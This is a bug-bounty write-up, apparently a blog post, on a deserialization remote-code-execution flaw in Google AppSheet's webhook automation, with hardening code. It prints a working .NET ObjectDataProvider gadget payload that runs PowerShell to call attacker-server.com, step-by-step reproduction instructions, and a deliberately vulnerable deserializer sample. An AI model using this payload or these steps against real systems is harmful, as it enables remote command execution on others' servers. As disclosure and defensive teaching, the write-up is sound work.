🎬 Introduction: No-Code, Full Access

Google's AppSheet is a no-code platform that powers thousands of business workflows. But in September 2022, one automation feature turned into a remote control for Google's own servers.

Security researcher Chip uncovered a Deserialization Remote Code Execution (RCE) vulnerability that allowed arbitrary PowerShell command execution on the backend.

The result?

  • 💰 $10,000 bounty
  • 🚨 Critical vulnerability fixed before abuse
  • 🌍 Millions of users protected

[Image: reward PoC]

🧩 What is Deserialization RCE?

Serialization = packing an object for storage or transfer
Deserialization = unpacking the object back into memory

If a deserializer lets the incoming data decide which types to instantiate and which members to set, an attacker can send an object graph whose mere construction runs code.

In .NET, a deserializer that honours attacker-supplied type names can be made to:

  • Instantiate classes it was never meant to see (System.Diagnostics.Process)
  • Invoke methods on them through a gadget class such as ObjectDataProvider (MethodName = Start)
  • Run shell commands (cmd, powershell)

🔍 How the Vulnerability Was Found

The Automation feature in AppSheet allows:

  1. Creating a Bot to run on a schedule (e.g., monthly)
  2. Adding a Webhook Step to call any URL via HTTP POST
  3. Supplying Custom JSON Body

Chip discovered that this custom body was handed to a .NET JSON deserializer that honoured the Json.NET-style `$type` property (visible in the payload below) with no restriction on which types could be named. That made it possible to instantiate arbitrary .NET object types, and to trigger method calls on them, during deserialization.

💻 Malicious Payload Example

{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": [
      "cmd",
      "/c powershell -command \"Invoke-WebRequest -URI http://attacker-server.com\""
    ]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}

📌 What it does:

  • ObjectDataProvider, once populated, calls the method named in MethodName (Start) on ObjectInstance, passing MethodParameters as the arguments
  • ObjectInstance is a fresh System.Diagnostics.Process, so Process.Start runs cmd with "/c powershell ..." and a new system process is spawned
  • PowerShell sends a web request to the attacker's server (proof that the command ran on the backend)

[Image: attack chain illustration]

🛠 Step-by-Step Reproduction (Educational Purpose Only)

⚠ Disclaimer: These steps are for educational & responsible disclosure purposes only. Running this on unauthorized systems is illegal.

Step 1: Create an AppSheet account and go to Automation
Step 2: Add a New Bot and set it to run on a schedule (e.g., Monthly)
Step 3: Add a Step → Call a Webhook
Step 4: Set Method = POST, URL = any test server you control (e.g., http://your-server.com)
Step 5: In the Body, paste the malicious payload above (change attacker-server.com to a host you control)
Step 6: Save and wait for the bot to run
Step 7: Check your server logs → you'll see a request from Google's AppSheet infrastructure

Note that the webhook step itself also POSTs to the URL from Step 4, so give the PowerShell payload a distinct path or host; otherwise the webhook's own request and the PowerShell callback that proves execution are hard to tell apart in the logs.

📊 Attack Chain Flow

[Attacker]
   │
   ▼
[AppSheet Automation Bot]
   │  (POST with malicious .NET object)
   ▼
[Unsafe Deserialization in Backend]
   │
   ▼
[System.Diagnostics.Process.Start()]
   │
   ▼
[PowerShell Command Execution]
   │
   ▼
[Attacker's Server Receives Callback]

🎯 Impact if Exploited by an Attacker

  • Execute arbitrary commands on Google's servers
  • Steal sensitive enterprise data from AppSheet-hosted apps
  • Deploy malware or ransomware in Google's infrastructure
  • Pivot into Google Cloud Platform internal services

📅 Timeline

  • Sep 19, 2022: Vulnerability reported to Google VRP
  • Sep 19, 2022: Triaged same day
  • Sep 28, 2022: Accepted
  • Oct 31, 2022: Patched
  • Bounty Awarded: $10,000

🛡 Google's Fix

  • Enforced type whitelisting in deserialization
  • Sanitized automation payloads
  • Prevented automation from spawning system processes

📚 Lessons for Developers

  • Never deserialize untrusted data
  • Use safe serialization formats (plain JSON bound to a fixed DTO, with polymorphic type binding such as Json.NET's TypeNameHandling switched off)
  • Apply input validation for automation/custom workflows
  • Log & monitor outbound requests from backend processes
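The deserializer pattern described under "What is Deserialization RCE?", beside the kind of fix described under "Google's Fix" and the "JSON without polymorphic type binding" lesson above, as an added example. This is not AppSheet's code and not Google's patch: it assumes the backend used Newtonsoft.Json (the `$type`/`$values` syntax in the payload is Json.NET's), and `WebhookBody`, `WebhookParsing` and `AllowListBinder` are hypothetical names chosen for the illustration.

```csharp
// Added example, not AppSheet's or Google's code. Assumes Newtonsoft.Json
// (Json.NET), whose "$type" metadata property is what the payload above
// targets. WebhookBody is a hypothetical DTO standing in for whatever shape
// the automation step really needs.
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using Newtonsoft.Json.Serialization;

// Hypothetical: the only shape a webhook body should ever take.
public sealed class WebhookBody
{
    public string Event { get; set; }
    public Dictionary<string, string> Fields { get; set; }
}

public static class WebhookParsing
{
    // VULNERABLE: any TypeNameHandling other than None lets the sender choose
    // the CLR type through "$type". Fed the ObjectDataProvider payload above on
    // a .NET Framework host that can load PresentationFramework, populating the
    // object calls Process.Start("cmd", "/c powershell ...") before this method
    // even returns.
    public static object ParseVulnerable(string json)
    {
        var settings = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All };
        return JsonConvert.DeserializeObject<object>(json, settings);
    }

    // Hardening, layer 1: walk the raw token tree and refuse a "$type" key at
    // any depth before a serializer ever sees it. Json.NET already ignores
    // "$type" under TypeNameHandling.None; rejecting it explicitly makes the
    // policy auditable and turns a probe into a logged failure.
    public static void RejectTypeMetadata(JToken token)
    {
        switch (token)
        {
            case JObject obj:
                foreach (JProperty prop in obj.Properties())
                {
                    if (prop.Name == "$type")
                        throw new JsonSerializationException("type metadata is not allowed in a webhook body");
                    RejectTypeMetadata(prop.Value);
                }
                break;
            case JArray arr:
                foreach (JToken item in arr)
                    RejectTypeMetadata(item);
                break;
        }
    }

    // Hardening, layer 2: bind to one concrete DTO with polymorphic type
    // binding switched off, so nothing in the JSON can pick a different type.
    public static WebhookBody ParseHardened(string json)
    {
        RejectTypeMetadata(JToken.Parse(json));
        var settings = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.None };
        return JsonConvert.DeserializeObject<WebhookBody>(json, settings);
    }
}

// Hardening, layer 3, only where polymorphism is genuinely required: an
// allow-list binder. Json.NET splits "$type" into assembly and type name and
// asks the binder for the Type; anything unknown (ObjectDataProvider included)
// is refused instead of resolved.
public sealed class AllowListBinder : ISerializationBinder
{
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        ["WebhookBody"] = typeof(WebhookBody),
    };

    public Type BindToType(string assemblyName, string typeName)
    {
        if (Allowed.TryGetValue(typeName, out Type allowed))
            return allowed;
        throw new JsonSerializationException("type not on the allow-list: " + typeName);
    }

    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null;
        typeName = serializedType.Name;
    }
}
```

The binder is wired in with `new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Objects, SerializationBinder = new AllowListBinder() }`. Two points worth checking in a review: `TypeNameHandling.Auto` is no safer than `All` for this payload, because Json.NET reads `$type` whenever the setting is anything but `None`, and the target type here is `object`; and the pre-parse rejection in layer 1 is what makes an exploitation attempt show up in logs rather than silently falling back to a `JObject`.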

🏆 Lessons for Bug Hunters

  • Explore automation & customization features; they are often overlooked
  • Test for server-side parsing of client-controlled input
  • In .NET apps, always check for object injection in JSON/XML
  • Chain with SSRF, RCE, or privilege escalation for higher impact

🚀 Conclusion

This bug shows that no-code ≠ no-risk. A single deserialization flaw turned a harmless automation bot into a remote control for Google's servers.

Thanks to responsible disclosure, Chip turned this potential global security threat into a $10,000 success story, proving that curiosity and ethics pay.

📢 Written by Aditya Sunny (@adityasunny06)

InfoSec Write-ups

Cybersecurity researcher, ethical hacker and cybersecurity enthusiast | Honoured by Bajaj Finance Security Heroes | Secured Meta (FB, IG, WA), Dell, Maffashion & more | Ex-Navodayan | Bug Hunter
